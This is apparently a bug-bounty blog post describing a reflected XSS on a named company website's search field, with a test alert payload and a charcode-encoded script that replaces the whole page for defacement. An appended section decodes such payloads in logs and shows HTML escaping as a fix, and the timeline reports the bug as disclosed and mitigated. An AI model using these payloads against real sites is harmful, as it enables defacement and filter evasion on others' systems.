XSS WITH HTML AND HOW TO CONVERT THE HTML INTO CHARCODE()

Hello, Back Again With Me

This time I want to try injecting XSS with a full-page HTML script. It can be described as “injecting XSS so that it shows your HTML page”.

As usual, I do a check with this input:

<script>alert('test')</script>

If it is vulnerable, I try something different.

My Target :

https://www.puninar.com/

Second, open this page:

Third, I try to convert my deface HTML page, lol.

Copy all of my HTML script.

Then open uncle jim’s page

Paste it into that part (zoom in if you can’t see):

Left side of charcodeat()

Then click the charcodeat() button

Right side of charcodeat()

After getting the result, I copy the char codes into my notepad.

Then I add some script:

<script>document.documentElement.innerHTML=(String.fromCharCode(*paste here your charcode*));</script>

It will look like this:


<script> document.documentElement.innerHTML=(String.fromCharCode(60, 104, 116, 109, 108, 62, 32, 10, 60, 104, 101, 97, 100, 62, 32, 10, 60, 115, 99, 114, 105, 112, 116, 62, 32, 118, 97, 114, 32, 109, 101, 115, 115, 97, 103, 101, 61, 34, 84, 73, 77, 73, 84, 83, 69, 67, 45, 78, 88, 71, 71, 34, 59, 10, 47, 47, /* and so on */));</script>


Then go back to your target page, paste it into the search field and press ENTER.

TADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA …..

injecting XSS full page
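Seen from the defending side, the markup in this payload exists only as numbers, so a filter or log search looking for HTML tags will not see what gets written into the page. The JavaScript below is an added example, not part of the original post: it decodes `String.fromCharCode()` calls found in a logged search parameter and shows the HTML-escaping that keeps a reflected search term inert. The function names and the sample value (built from the first six char codes shown above) are assumptions made for illustration.

```javascript
// Constructed sample: the post's script shape with only its first six char codes.
const SAMPLE = '<script>document.documentElement.innerHTML=' +
  '(String.fromCharCode(60, 104, 116, 109, 108, 62));</script>';

// Decode every String.fromCharCode(...) call whose arguments are plain integers.
function decodeCharCodeCalls(text) {
  const call = /String\s*\.\s*fromCharCode\s*\(([\d\s,]*)\)/g;
  const decoded = [];
  for (const m of text.matchAll(call)) {
    const codes = m[1].split(',').map(s => s.trim()).filter(Boolean).map(Number);
    if (codes.length && codes.every(c => Number.isInteger(c) && c <= 0xFFFF)) {
      // map/join instead of spread so very long payloads do not hit the argument limit
      decoded.push(codes.map(c => String.fromCharCode(c)).join(''));
    }
  }
  return decoded;
}

// Triage one logged query-string value (hypothetical helper name).
function inspectSearchParam(value) {
  let text;
  try {
    text = decodeURIComponent(value.replace(/\+/g, ' '));
  } catch {
    text = value; // malformed percent-encoding: inspect the raw value instead
  }
  const decoded = decodeCharCodeCalls(text);
  const markup = /<\s*\/?\s*[a-z!][^>]*>/i;
  return {
    rawHasScriptTag: /<\s*script\b/i.test(text),
    domOverwrite: /document\s*\.\s*documentElement\s*\.\s*innerHTML\s*=/.test(text),
    decoded,
    hiddenMarkup: decoded.some(s => markup.test(s)),
  };
}

// Mitigation: escape the search term before reflecting it into HTML.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

console.log(inspectSearchParam(encodeURIComponent(SAMPLE)));
console.log(escapeHtml(SAMPLE));
```

With the search term passed through `escapeHtml` before it is reflected, the browser renders the payload as text and neither the `<script>` element nor the decoded markup is ever parsed.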

That's it

Thank you

timeline

  • 20/10/2018 (Submit Report)
  • 21/10/2018 (Mitigation Bug)
  • 22/10/2018 (Say Thank you only no reward Shit & Bug Closed)